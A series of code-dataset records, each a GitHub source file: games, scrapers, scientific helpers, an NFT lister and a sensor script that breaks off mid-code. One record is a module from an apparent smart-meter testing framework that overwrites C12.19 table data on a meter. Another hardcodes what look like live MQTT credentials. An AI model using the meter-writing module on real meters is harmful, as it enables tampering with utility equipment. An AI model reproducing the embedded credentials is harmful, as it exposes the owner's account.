}\n","repo_name":"microsoft/jupyter-Kqlmagic","sub_path":"azure/Kqlmagic/bug_report.py","file_name":"bug_report.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"47"} +{"seq_id":"41566494405","text":"from myPackage import requests\n\nparameters={\"country\":\"IRAN\"}\nresponse = requests.get(\"http://universities.hipolabs.com/search?\",parameters)\n\n\nif response.status_code==200:\n res_json=response.json()\nelse:\n print(\"Error :\" , response.status_code)\n\n\nprint(res_json[0][\"name\"])\n\n\n\n","repo_name":"rezaho96/AI_Course","sub_path":"PythonAdvanced/package/myPackage/API_Test1.py","file_name":"API_Test1.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39790984266","text":"import pygame\nimport sys\nimport global_variables as gv\nimport pacman as pm\nimport animation as ani\nimport ghost as gh\n\n# initialize pygame\npygame.init()\npygame.font.init()\nclock = pygame.time.Clock()\n\n# game logic variables\nreached_second_level = False\nreached_third_level = False\nin_first_level = True\nin_menu = True\nwin = False\nran_once = False\nx = 0\n\n# animation variables\nflash_text_counter = 0\ngv.pacman_tick_counter = 0\n\n# generating a screen\ngv.screen = pygame.display.set_mode(gv.screensize)\npygame.display.set_caption(\"Daniel's PacMan\")\n\n# create pacman and ghost objects\ngv.pacman = pm.Pacman([480, 200])\nghost_starting_positions = [[30, 30], [950, 30], [30, 450], [950, 450]]\nghost_second_level_positions = [[30, 30], [950, 30], [30, 450], [950, 450]]\nghost_third_level_positions = [[30, 30], [950, 30], [30, 450], [950, 450]]\nfor ghost_type in range(4):\n gv.ghosts.append(gh.Ghost(ghost_type, ghost_starting_positions[ghost_type]))\n\n# create pellet lists\nani.read_pellet_images()\n\n# menu loop\nwhile in_menu:\n gv.screen.fill((0, 0, 0))\n if flash_text_counter == 0:\n flash_text_counter = 1\n else:\n flash_text_counter = 0\n ani.draw_hint(gv.screen) # showing the text\n # ordinary pygame loop which enables closing\n gv.keys_pressed = pygame.key.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n # if space pressed than the game starts\n if gv.keys_pressed[pygame.K_SPACE]:\n in_menu = False\n\n ani.draw_heading(gv.screen) # showing the text\n pygame.display.flip()\n clock.tick(5)\n\n# main game loop\nwhile not gv.game_over:\n # event handling\n gv.keys_pressed = pygame.key.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n # game logic\n gv.pacman.pacman_event_handler(gv.keys_pressed)\n gv.pacman.move()\n if ran_once:\n gv.pacman.test_ghost_collision()\n for ghost in gv.ghosts:\n ghost.move()\n\n # switching levels\n if gv.score == 587 and in_first_level: # changes to 2nd level\n gv.pacman.position[0] = 480 # reset pacman position\n gv.pacman.position[1] = 200\n in_first_level = False\n gv.current_level = 1\n gv.score = 0\n reached_second_level = True\n x = 1 # new level path\n for j in range(4): # reset the position of the ghosts\n gv.ghosts[j].position = ghost_second_level_positions[j]\n\n # changes to 3rd level\n elif gv.score == 422 and reached_second_level:\n gv.pacman.position[0] = 480 # reset pacman position\n gv.pacman.position[1] = 200\n gv.current_level = 2\n gv.score = 0\n reached_third_level = True\n reached_second_level = False\n x = 2 # new level path\n for j in range(4): # reset the position of the ghosts\n gv.ghosts[j].position = ghost_second_level_positions[j]\n\n elif gv.score == 340 and reached_third_level:\n win = True\n\n # animation\n ani.blit_level(gv.LEVEL_PATHS[x], gv.screen)\n ani.draw_pellets(gv.screen, gv.current_level)\n ani.draw_score(gv.screen)\n\n gv.pacman.ani_tick_counter = gv.pacman.ani_tick_counter + 1\n if gv.pacman.ani_tick_counter >= gv.pacman.ANI_DURATION - 1:\n gv.pacman.ani_tick_counter = 0\n\n gv.pacman.blit_pacman(gv.screen)\n for ghost in gv.ghosts:\n ghost.blit_ghost(gv.screen)\n\n pygame.display.flip()\n clock.tick(30)\n ran_once = True\n\n # the end screen if you win (same system as in menu loop)\n while win:\n gv.screen.fill((0, 0, 0))\n if flash_text_counter == 0:\n flash_text_counter = 1\n else:\n flash_text_counter = 0\n ani.draw_hint2(gv.screen)\n gv.keys_pressed = pygame.key.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if gv.keys_pressed[pygame.K_SPACE]:\n gv.game_over = True\n win = False\n ani.draw_win(gv.screen) # showing the text\n pygame.display.flip()\n clock.tick(5)\n\n # the end screen if you lose (same system as in menu loop)\n while gv.lose:\n gv.screen.fill((0, 0, 0))\n if flash_text_counter == 0:\n flash_text_counter = 1\n else:\n flash_text_counter = 0\n ani.draw_hint2(gv.screen)\n\n gv.keys_pressed = pygame.key.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n if gv.keys_pressed[pygame.K_SPACE]:\n gv.game_over = True\n gv.lose = False\n ani.draw_lost(gv.screen) # showing the text\n pygame.display.flip()\n clock.tick(5)\n","repo_name":"Daniel031000/pacman-unchained2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32604385647","text":"import sqlite3\nfrom contextlib import closing\nfrom crawler import fetch_page, get_total_pages\n\ntotal = 1\ncurrent = 1\noutput = []\nwhile current <= total:\n response = fetch_page(current)\n\n if current == 1:\n total = get_total_pages(response)\n\n for dissertation in response['tesesDissertacoes']:\n print(dissertation)\n output.append(dissertation)\n\n current += 1 # let's go to the next page (the while condition blocks a non-existent page)\n\ndados = []\nfor saida in output:\n if saida not in dados:\n dados.append((saida['id'], saida['instituicao'], saida['nomePrograma'], saida['municipioPrograma'],\n saida['titulo'], saida['autor'], saida['dataDefesa'], saida['volumes'], saida['paginas'],\n saida['biblioteca'], saida['grauAcademico'], saida['link']))\n\nwith sqlite3.connect(\"tesesDissertacoes.db\") as conexao:\n with closing(conexao.cursor()) as cursor:\n cursor.execute(\"\"\" CREATE TABLE IF NOT EXISTS \n tesesDissertacoes(id integer primary key autoincrement, codigo text,\n instituicao text, programa text, municipio text, titulo_trabalho text, autor_trabalho text,\n data_defesa text, num_volumes text, num_paginas text, biblioteca text, grau_academico text, \n link text)\"\"\")\n\n cursor.executemany(\"\"\" INSERT INTO tesesDissertacoes(codigo, instituicao, programa, municipio, \n titulo_trabalho, autor_trabalho, data_defesa, num_volumes, num_paginas, biblioteca, grau_academico, \n link) values(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?); \"\"\", dados)\n\n conexao.commit()\n\n print(\"Base de dados criada e populada com sucesso!\")\n","repo_name":"Riverfount/PesquisaTeses","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"27259740230","text":"import numpy\nimport string\n\ndef read(mol, f, cycle = 0):\n \"\"\"\n Routine, which reads an xyz file\n :Parameters:\n -f (obj): xyz file object\n -mol (obj): instance of a molclass\n \"\"\"\n ncycle=0\n fline = f.readline().split()\n natoms = int(fline[0])\n ### look how many cycles are in \n# for line in f.readlines():\n# sline=line.split()\n# if len(sline)==1:\n# if int(sline)==natoms: ncycle+=1\n# ### now seek to cycle\n# cycle=range(ncycle)[cycle]\n# f.seek(natoms*cycle+1)\n# if len(fline)>1:\n# cellparams = map(float,fline[1:7])\n# mol.set_cellparams(cellparams)\n f.readline()\n xyz = numpy.zeros((natoms, 3))\n elements = []\n atypes = []\n for i in range(natoms):\n line = f.readline().split()\n elements.append(line[0].lower())\n atypes.append(line[0].lower())\n xyz[i,:] = list(map(float,line[1:4]))\n mol.natoms = natoms\n mol.xyz = numpy.array(xyz)\n mol.elems = elements\n mol.atypes = atypes\n mol.set_empty_conn()\n mol.set_nofrags()\n return\n\ndef write(mol, fname):\n \"\"\"\n Routine, which writes an xyz file\n :Parameters:\n -fname (str): name of the xyz file\n -mol (obj): instance of a molclass\n \"\"\"\n natoms = mol.natoms \n f = open(fname,\"w\")\n# if mol.periodic:\n# f.write(\"%5d %10.4f %10.4f %10.4f %10.4f %10.4f %10.4f\\n\\n\" % tuple([mol.natoms]+mol.cellparams))\n# else:\n f.write(\"%d\\n\\n\" % mol.natoms)\n for i in range(natoms):\n f.write(\"%2s %12.6f %12.6f %12.6f\\n\" % (mol.elems[i], mol.xyz[i,0], mol.xyz[i,1], mol.xyz[i,2]))\n f.close()\n return\n","repo_name":"hopefulp/sandbox","sub_path":"Archive_sand/MOF_plus/molsys/molsys/fileIO/xyz.py","file_name":"xyz.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21069095362","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\nnums = list(map(int,input().split()))\r\nnums.sort()\r\ndef check():\r\n st=0\r\n en=len(nums)-1\r\n min_s=2e9\r\n st_num=0\r\n en_num=0\r\n while stabs(s):\r\n st_num=nums[st]\r\n en_num=nums[en]\r\n min_s=abs(s)\r\n if s<0:\r\n st+=1\r\n elif s>0:\r\n en-=1\r\n else:\r\n return (st_num,en_num)\r\n return (st_num,en_num)\r\n\r\nprint(*check())","repo_name":"nuheajiohc/algorithm-study","sub_path":"백준/Gold/2470. 두 용액/두 용액.py","file_name":"두 용액.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"72425554062","text":"import sys\nimport requests\n\ndef list_nfts(address):\n if not address:\n raise ValueError(\"Address cannot be empty\")\n\n API_ENDPOINT = f\"https://api.blockcypher.com/v1/btc/main/addrs/{address}/full\"\n try:\n response = requests.get(API_ENDPOINT)\n response.raise_for_status()\n response_data = response.json()\n except requests.exceptions.RequestException as e:\n raise ValueError(f\"Error fetching address data: {e}\")\n\n nfts = []\n if \"txs\" in response_data:\n for tx in response_data[\"txs\"]:\n for output in tx[\"outputs\"]:\n if \"data_hex\" in output:\n try:\n metadata_hex = output[\"data_hex\"]\n metadata = bytes.fromhex(metadata_hex).decode(\"utf-8\")\n nfts.append({\"txid\": tx[\"hash\"], \"metadata\": metadata})\n except ValueError as e:\n print(f\"Error decoding metadata: {e}\")\n else:\n raise ValueError(\"No transactions found for the given address\")\n\n return nfts\n\nif __name__ == \"__main__\":\n try:\n address = sys.argv[1]\n nfts = list_nfts(address)\n print(nfts)\n except (IndexError, ValueError) as e:\n print(f\"Error: {e}\")\n","repo_name":"REDEXCT/DAVID-x-REDEX","sub_path":"Project 2/Ordinal Audio/nft_listing.py","file_name":"nft_listing.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33496639817","text":"import os\nimport re\nimport random\nimport datetime\n\nclass AlphaSubstBaseMLBootstrap:\n \"This package will perform bootstrap acoording to its parameters, and encapsulate the baseML functionality\"\n\n def __init__(self, ResultsFolder):\n \"Doc Holder\"\n self.ResultsFolder = ResultsFolder\n self.BaseMLBranchDesc = []\n self.TransRatio = \"\"\n self.RateMatrix = []\n self.BaseFreq = []\n self.RateParameters = []\n self.RateParameterHeaders = []\n self.GotExtraBaseML = 0\n\n def RunBaseML(self,BaseMLLoc,UserRandomKey,GalaxyLocation):\n \"This function will execute baseml and return the results for the branch description\"\n op = os.popen(BaseMLLoc + \"baseml \" + GalaxyLocation + \"tools/mdea/BaseMLWork/\" + str(UserRandomKey) + \"-baseml.ctl\")\n\n def FinalCleanUp(self,BaseMLLocation,GalaxyLocation,UserRandomKey):\n \"This function will clear the tree and the baseml.ctl files\"\n op = os.remove(GalaxyLocation + 'tools/mdea/BaseMLWork/' + str(UserRandomKey) + \"-baseml.ctl\")\n op = os.remove(GalaxyLocation + 'tools/mdea/BaseMLWork/' + str(UserRandomKey) + \"-tmp.tree\")\n\n self.DeleteOldFiles(GalaxyLocation,3)\n\n def DeleteOldFiles(self,DirectoryToSearch,DaysOld):\n \"This program will search the work directory and delete files that are older than 3 days\"\n CorrectFormatSearch = re.compile('^[0-9]{4}-[0-9]{2}-[0-9]{2}-[0-9]+-(baseml|tmp)')\n WorkDirectory = DirectoryToSearch + 'tools/mdea/BaseMLWork/' \n TodaysDateValue = int(self.DateToDays(str(datetime.date.today())))\n DateDifference = 0\n #Open the directory and return the file names\n for FileName in os.listdir(WorkDirectory):\n if CorrectFormatSearch.search(FileName):\n FilesDateValue = int(self.DateToDays(FileName))\n DateDifference = TodaysDateValue - FilesDateValue\n\n if DateDifference > int(DaysOld):\n op = os.remove(WorkDirectory + str(FileName))\n\n def MonthToDays(self,MonthValue):\n \"This returns how many days have passed in the month - no leap year support as yet\"\n DaysInMonths = [31,28,31,30,31,30,31,31,30,31,30,31]\n MonthDays = 0\n for MonthIndex in range(0,MonthValue - 1):\n MonthDays += int(DaysInMonths[MonthIndex]) \n return MonthDays\n\n def DateToDays(self,DateString):\n DateSplitter = re.compile(\"-\")\n aDateParts = DateSplitter.split(DateString)\n Years = int(aDateParts[0][2:]) * 365\n Months = int(self.MonthToDays(int(aDateParts[1])))\n Days = int(aDateParts[2])\n return Years + Months + Days\n\n def ReturnBaseMLFile(self,UserRandomKey,GalaxyLocation):\n \"This function will return the contents of the baseml output file, enclosed in a textarea\"\n FileResults = \"\"\n BaseMLOut = open(GalaxyLocation + 'tools/mdea/BaseMLWork/' + str(UserRandomKey) + \"-tmp.out\")\n FileResults = BaseMLOut.read()\n return FileResults\n\n def ScoreBaseML(self,BaseMLLoc,UserRandomKey,BranchDescriptions,GalaxyLocation,GetSE,DoExtraBaseML,SubstModel):\n \"This function will read tmp.out and set an array of the scores - return a 1 if it was successful - 0 otherwise\"\n SuccessfulRun = 0\n SubstModel = int(SubstModel)\n ScoreLineCheck = re.compile('[0-99]\\.\\.[0-99]')\n SESearch = re.compile('SEs for parameters')\n BaseFreqSearch = re.compile('^Average')\n KappaSearch = re.compile('^Parameters \\(kappa\\)')\n RateParameterSearch = re.compile('Rate parameters')\n ThreeSpaceSplitter = re.compile(' ')\n TwoSpaceSplitter = re.compile(' ')\n OneSpaceSplitter = re.compile(\" \")\n SpaceSplitter = re.compile(\"\\s\")\n CommaJoin = re.compile(\",\")\n NewLineSplitter = re.compile('\\n')\n TransSearch = re.compile('Ts\\/Tv');\n EqualSplit = re.compile('=')\n\n DoExtraBaseML = int(DoExtraBaseML)\n TransParts = []\n RateParts = []\n TransRatio = 0\n FileContents = []\n BranchNameArray = []\n BranchScoreArray = []\n BaseMLScoreResults = []\n FinalBranchEntry = []\n SEResults = []\n BaseMLOut = open(GalaxyLocation + 'tools/mdea/BaseMLWork/' + str(UserRandomKey) + \"-tmp.out\")\n FileContents = NewLineSplitter.split(BaseMLOut.read())\n for FileIndex in range(0,len(FileContents)):\n if ScoreLineCheck.search(FileContents[FileIndex]):\n FileContents[FileIndex] = FileContents[FileIndex].strip()\n FileContents[FileIndex+1] = FileContents[FileIndex+1].strip()\n BranchNameArray = ThreeSpaceSplitter.split(FileContents[FileIndex])\n while TwoSpaceSplitter.search(FileContents[FileIndex+1]):\n FileContents[FileIndex+1] = TwoSpaceSplitter.sub(\" \", FileContents[FileIndex+1])\n BranchScoreArray = OneSpaceSplitter.split(FileContents[FileIndex+1])\n if int(GetSE) == 0 and DoExtraBaseML == 0:\n break\n if SESearch.search(FileContents[FileIndex]):\n FileContents[FileIndex+1] = FileContents[FileIndex+1].strip()\n while TwoSpaceSplitter.search(FileContents[FileIndex+1]):\n FileContents[FileIndex+1] = TwoSpaceSplitter.sub(\" \", FileContents[FileIndex+1])\n SEResults = OneSpaceSplitter.split(FileContents[FileIndex+1])\n if DoExtraBaseML == 0:\n break\n\n if DoExtraBaseML == 1 and self.GotExtraBaseML == 0:\n if BaseFreqSearch.search(FileContents[FileIndex]):\n BaseFreqLine = FileContents[FileIndex][10:]\n self.BaseFreq = SpaceSplitter.split(BaseFreqLine.strip())\n\n if KappaSearch.search(FileContents[FileIndex]):\n FileIndex += 1\n KappaLine = FileContents[FileIndex].strip()\n if SubstModel != 6:\n self.RateParameters = [KappaLine]\n self.RateParameterHeaders = ['Kappa']\n else:\n KappaValues = TwoSpaceSplitter.split(KappaLine)\n self.RateParameters = [KappaValues[0],KappaValues[1]]\n self.RateParameterHeaders = ['Kappa1','Kappa2']\n\n if SubstModel == 7 or SubstModel == 8: #Rate Matrix for REV and UNREST\n if TransSearch.search(FileContents[FileIndex]):\n TransParts = EqualSplit.split(FileContents[FileIndex])\n TransRatio = TransParts[1].strip()\n self.TransRatio = float(TransRatio)\n #Next 4 lines are the rate matrix data\n for RateLineIndex in range(0,4):\n self.RateMatrix.append([])\n RateLine = FileContents[FileIndex+RateLineIndex+1]\n RateLine = RateLine.strip()\n RateParts = ThreeSpaceSplitter.split(RateLine)\n for RatePartIndex in range(0,4):\n RateParts[RatePartIndex] = RateParts[RatePartIndex].strip()\n self.RateMatrix[RateLineIndex].append(float(RateParts[RatePartIndex]))\n \n if RateParameterSearch.search(FileContents[FileIndex]):\n RateParameterLine = FileContents[FileIndex][17:]\n RateParameterLine = RateParameterLine.strip()\n self.RateParameters = TwoSpaceSplitter.split(RateParameterLine)\n if SubstModel == 7: self.RateParameterHeaders = ['A','B','C','D','E']\n elif SubstModel == 8: self.RateParameterHeaders = []\n else:\n self.RateMatrix = \"\"\n if SubstModel == 0 or SubstModel == 2:\n self.RateParameters = \"\"\n self.RateParameterHeaders = \"\"\n\n BaseMLOut.close()\n #Get BaseML ordered branch descriptions - if they aren't already present\n if len(self.BaseMLBranchDesc) == 0:\n for Branch in BranchNameArray:\n Branch = OneSpaceSplitter.sub(\"\",Branch)\n self.BaseMLBranchDesc.append(Branch)\n\n if len(BranchNameArray) != 0:\n SuccessfulRun = 1\n self.BaseMLScores = BranchScoreArray\n self.SEScores = SEResults\n else:\n SuccessfulRun = 0\n self.BaseMLScores = []\n self.SEScores = []\n\n self.CleanData(UserRandomKey,GalaxyLocation + \"tools/mdea/BaseMLWork/\")\n\n return SuccessfulRun\n\n def CleanData(self,UserRandomKey,WorkDir):\n \"This function will remove the tmp.out and tmp.seq files\"\n op = os.remove(WorkDir + str(UserRandomKey) + \"-tmp.out\")\n op = os.remove(WorkDir + str(UserRandomKey) + \"-tmp.seq\")\n\n def WriteDBSAlignment(self,SequenceLength,SequenceCount,SequenceData,UserRandomKey,DoBootStrap):\n \"This function will bootstrap and write a tmp.seq file for baseML\"\n if str(DoBootStrap) == \"1\":\n StrappedSequence = self.DoStrap(SequenceData,SequenceLength,SequenceCount)\n else:\n StrappedSequence = \" \" + str(SequenceCount) + \" \" + str(SequenceLength) + \"\\n\"\n for Index in range(0,len(SequenceData)):\n StrappedSequence += \">Sequence\" + str(Index + 1) + \"\\n\"\n StrappedSequence += str(SequenceData[Index]) + \"\\n\" \n\n #Check Strapped sequence - for the presence of all nucleotides\n self.WriteFile(\"tools/mdea/BaseMLWork/\" + str(UserRandomKey) + \"-tmp.seq\",StrappedSequence)\n\n def StrapSequence(self,StartSeqArray,SequenceLength,SequenceCount,UserRandomKey,DoBootStrap):\n \"This will create a sequence replica from a starting Sequence (StartingSequence) - and write it as a tmp.out to the baseml work directory\"\n SequenceLine = \"\"\n Splitter = re.compile('\\n') \n \n #Bootstrap and return\n if str(DoBootStrap) == \"1\":\n StrappedSequence = self.DoStrap(StartSeqArray,SequenceLength,SequenceCount)\n else:\n StrappedSequence = \" \" + str(SequenceCount) + \" \" + str(SequenceLength) + \"\\n\" #BaseML Style header\n for BlankArrayIndex in range(0,int(SequenceCount)):\n StrappedSequence += \">Sequence\" + str(BlankArrayIndex + 1) + \"\\n\"\n StrappedSequence += str(StartSeqArray[BlankArrayIndex]) + \"\\n\"\n self.WriteFile(\"tools/mdea/BaseMLWork/\" + str(UserRandomKey) + \"-tmp.seq\",StrappedSequence)\n\n def DoStrap(self,Sequences,SequenceLength,SequenceCount):\n \"Bootstraps a sequence array\"\n FinalSequenceArray = []\n FinalSeqFile = \"\"\n for BlankArrayIndex in range(0,int(SequenceCount)):\n FinalSequenceArray.append('') #Initialize a blank array\n\n #Bootstrap the sequences\n \n for SequenceLengthIndex in range(0,int(SequenceLength)):\n SamplePosition = random.randrange(0,int(SequenceLength),1)\n for SequenceCountIndex in range(0,int(SequenceCount)):\n FinalSequenceArray[SequenceCountIndex] += Sequences[SequenceCountIndex][SamplePosition]\n\n #Assemble the replica and return to caller\n FinalSeqFile = \" \" + str(SequenceCount) + \" \" + str(SequenceLength) + \"\\n\" #BaseML Style header\n for BlankArrayIndex in range(0,int(SequenceCount)):\n FinalSeqFile += \">Sequence\" + str(BlankArrayIndex + 1) + \"\\n\"\n FinalSeqFile += str(FinalSequenceArray[BlankArrayIndex][0:]) + \"\\n\"\n return FinalSeqFile\n\n def WriteFile(self,FileName,Data):\n \"This function will write the data passed to a file on the file system\"\n TargetFile = file(FileName, \"w\")\n TargetFile.write(Data)\n TargetFile.close()\n","repo_name":"jmchilton/galaxy-central","sub_path":"tools/mdea/AlphaSubstBaseMLBootstrap.py","file_name":"AlphaSubstBaseMLBootstrap.py","file_ext":"py","file_size_in_byte":11958,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"} +{"seq_id":"25413189733","text":"import_file = \"template.anm2\"\n\nlayer = (\"head0\", \"head1\", \"head2\", \"head3\", \"head4\", \"head5\")\n\nwith open(import_file) as f:\n original = f.readlines()\n\n \nfor i in range(1, 7):\n for j in range(0, 351, 10):\n with open(\"lock_{}_{}.anm2\".format(i, j), \"w\") as k:\n export_file = [line.format(id=i, hue=j, name=layer[i-1]) for line in original]\n k.writelines(export_file)\n\n","repo_name":"patcolyn/RandomRainbowMaggy","sub_path":"generators/anm2-generate/anm2-generate.py","file_name":"anm2-generate.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"41006974470","text":"import re\nfrom binascii import unhexlify\nfrom framework.templates import module_template\nfrom c1218.errors import C1218WriteTableError\n\nclass Module(module_template):\n\tdef __init__(self, *args, **kwargs):\n\t\tmodule_template.__init__(self, *args, **kwargs)\n\t\tself.version = 1\n\t\tself.author = [ 'Spencer McIntyre ' ]\n\t\tself.description = 'Write Data To A C12.19 Table'\n\t\tself.detailed_description = 'This will over write the data in a write able table on the smart meter. If USEHEX is set to true then the DATA variable is expected to be represented as a string of hex characters.'\n\t\tself.options.addInteger('TABLEID', 'table to read from', True)\n\t\tself.options.addString('DATA', 'data to write to the table', True)\n\t\tself.options.addBoolean('USEHEX', 'specifies that the \\'DATA\\' option is represented in hex', default = False)\n\t\tself.options.addInteger('OFFSET', 'offset to start writing data at', required = False, default = None)\n\t\n\tdef run(self, frmwk, args):\n\t\ttableid = self.options['TABLEID']\n\t\tdata = self.options['DATA']\n\t\toffset = self.options['OFFSET']\n\t\tlogger = frmwk.get_module_logger(self.name)\n\t\tif self.options['USEHEX']:\n\t\t\thex_regex = re.compile('^([0-9a-fA-F]{2})+$')\n\t\t\tif hex_regex.match(data) == None:\n\t\t\t\tfrmwk.print_error('Non-hex characters found in \\'DATA\\'')\n\t\t\t\treturn\n\t\t\tdata = unhexlify(data)\n\t\t\n\t\tif not frmwk.serial_login():\n\t\t\tlogger.warning('meter login failed')\n\t\t\tfrmwk.print_error('Meter login failed')\n\t\t\treturn\n\t\t\n\t\tconn = frmwk.serial_connection\n\t\ttry:\n\t\t\tconn.setTableData(tableid, data, offset)\n\t\t\tfrmwk.print_status('Successfully Wrote Data')\n\t\texcept C1218WriteTableError as error:\n\t\t\tfrmwk.print_error('Caught C1218WriteTableError: ' + str(error))\n\t\tconn.stop()\n","repo_name":"GrayHatLabs/john_commor_c1218","sub_path":"termineter2/framework/modules/write_table.py","file_name":"write_table.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"4344415711","text":"from datetime import date, datetime, timedelta\nfrom uuid import UUID\n\nfrom sqlalchemy import and_, func, or_\nfrom sqlalchemy.orm import aliased\n\nfrom app.model import Employee, Vacation\nfrom app.repository.base import BaseRepository\n\n\nclass _EmployeeRepository(BaseRepository):\n def _as_paginated_query(self, query, page, per_page):\n return query.count(), query.limit(per_page).offset((page - 1) * per_page).all() \n \n def search_employees(self, session, search_term: str = None, page: int = 1, per_page: int = 10):\n filters = []\n\n if search_term:\n filters = [\n or_(\n self.model.first_name.like(f'%{search_term}%'),\n self.model.last_name.like(f'%{search_term}%'),\n )\n ]\n\n query = session.query(self.model).filter(*filters)\n return self._as_paginated_query(query=query, page=page, per_page=per_page)\n \n def get_employees_in_vacation(self, session, team_id: UUID = None, at_date: date = None, page: int = 1, per_page: int = 10):\n at_date = at_date or date.today()\n \n filters = [\n Vacation.start_date <= at_date, \n Vacation.end_date >= at_date,\n ]\n\n if team_id:\n filters.append(self.model.team_id == team_id)\n\n query = (\n session.query(self.model)\n .join(Vacation, Vacation.employee_id == self.model.id)\n .filter(*filters)\n )\n\n return self._as_paginated_query(query, page, per_page)\n \n def get_employees_shared_vacations(self, session, employee_1: Employee, employee_2: Employee):\n \"\"\"\n Return the days they will both be on vacation\n \"\"\"\n vacation_1 = aliased(Vacation)\n vacation_2 = aliased(Vacation)\n\n overlap_period = (\n session.query(\n func.greatest(vacation_1.start_date, vacation_2.start_date).label(\"start_date\"),\n func.least(vacation_1.end_date, vacation_2.end_date).label(\"end_date\")\n )\n .join(\n vacation_2, \n and_(\n vacation_1.start_date <= vacation_2.end_date,\n vacation_1.end_date >= vacation_2.start_date\n )\n )\n .filter(\n vacation_1.employee_id == employee_1.id, \n vacation_2.employee_id == employee_2.id \n )\n .group_by(\n vacation_1.id,\n vacation_2.id,\n )\n .all()\n )\n\n if not overlap_period:\n return {}\n \n overlap_dates = []\n for start_date, end_date in overlap_period:\n overlap_dates.extend(\n [start_date + timedelta(days=i) for i in range((end_date - start_date).days + 1)]\n )\n\n return set(sorted(overlap_dates))\n\n\nEmployeeRepository = _EmployeeRepository(model=Employee)\n","repo_name":"camillebeguin/fastapi-vacation-api","sub_path":"app/repository/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22853146260","text":"import serial, time, csv, os\nimport logging\nimport numpy as np\nimport heartpy as hp\nimport smbus2 as smbus\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as anim\nimport platform\nimport timeit\nimport cayenne.client\nfrom timeit import default_timer as timer_s\nfrom time import perf_counter\nfrom scipy.signal import peak_widths\nfrom scipy.signal import peak_prominences\nfrom scipy.signal import find_peaks\nfrom scipy.signal import find_peaks_cwt\nfrom scipy.signal import resample\nfrom scipy.fft import fft, ifft\nfrom scipy.signal import butter, lfilter\nfrom smbus2 import SMBus\n\nprint(\"Imported Platform module version: \", platform.__version__)\nprint(\"Matplotlib version: \"+mpl.__version__)\n\n##I2C SLAVES SET UP\nDHT_ADDRESS = 8 #0x08\nOXY_ADDRESS = 11 #0x0b\n#slavex_address = xxxx #write address\n#slavey_address = xxxx #write address\n#slavez_address = xxxx #write address\nbus = SMBus(1) #indicates /dev/ic2-1\n\n\n##CAYENNE SERVICE\n# Cayenne authentication info. This should be obtained from the Cayenne Dashboard.\nMQTT_USERNAME = \"4d158210-e641-11eb-8779-7d56e82df461\"\nMQTT_PASSWORD = \"ca89ad8811a5ea3006523a32946b58491a1a4c65\"\nMQTT_CLIENT_ID = \"b65c60f0-4761-11ec-ad90-75ec5e25c7a4\"\n\n\nclient = cayenne.client.CayenneMQTTClient()\nclient.begin(MQTT_USERNAME, MQTT_PASSWORD, MQTT_CLIENT_ID)\n# For a secure connection use port 8883 when calling client.begin:\n# client.begin(MQTT_USERNAME, MQTT_PASSWORD, MQTT_CLIENT_ID, port=8883)\n\n\ntimestamp = 0\n\n\nif __name__ == '__main__':\n #Create I2C BUS\n I2Cbus = smbus.SMBus(1)\n\n with smbus.SMBus(1) as I2Cbus:\n slaveSelect = input(\"Which device (1-2): \")\n\n if slaveSelect == \"1\":\n ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=2)\n ser.flush() \n oxy_data=bus.read_byte(OXY_ADDRESS,0)\n timer = []\n hrdata= []\n start_word = False\n while True:\n \n try:\n data = ser.readline().decode('utf-8').rstrip()\n #time.sleep(0.3)\n hrdata.append(data) # append to data vector \n \n time_arr = round(time.time())\n print(type(time_arr))\n timer.append(time_arr)\n print(hrdata)\n if len(hrdata) > 25:\n break\n \n except KeyboardInterrupt:\n \n break\n \n print(\"Exited Loop\") \n hrdata_arr=np.array(hrdata)\n timer_arr=np.array(timer) \n #Sample Rate\n fs=hp.get_samplerate_mstimer(timer_arr)\n print(\"fs: \",fs) \n #String to Int\n for i in range(len(hrdata_arr)):\n hr_int=hrdata_arr.astype(np.int32)\n #hr_int=np.empty_like(hrdata_arr, dtype = int) \n \n print(\"PPG data: \",hr_int)\n\n time.sleep(0.4)\n print(\"Extracting measurements...\")\n time.sleep(1)\n \n #Heart Rate\n hr_fft=np.fft.fft(hr_int)\n print(\"FFT: \",hr_fft)\n freq=np.fft.fftfreq(len(hr_fft))\n \n print(\"hr_fft: \",hr_fft)\n fft_peak=find_peaks(hr_fft,threshold=350,distance=30)\n print(\"Peaks from FFT: \",fft_peak)\n \n bpm=(np.mean(fft_peak[:1])*6)\n \n \n #SBP Calculation\n pks=find_peaks(hr_int,threshold=400, distance=20, width=50,prominence=200)\n 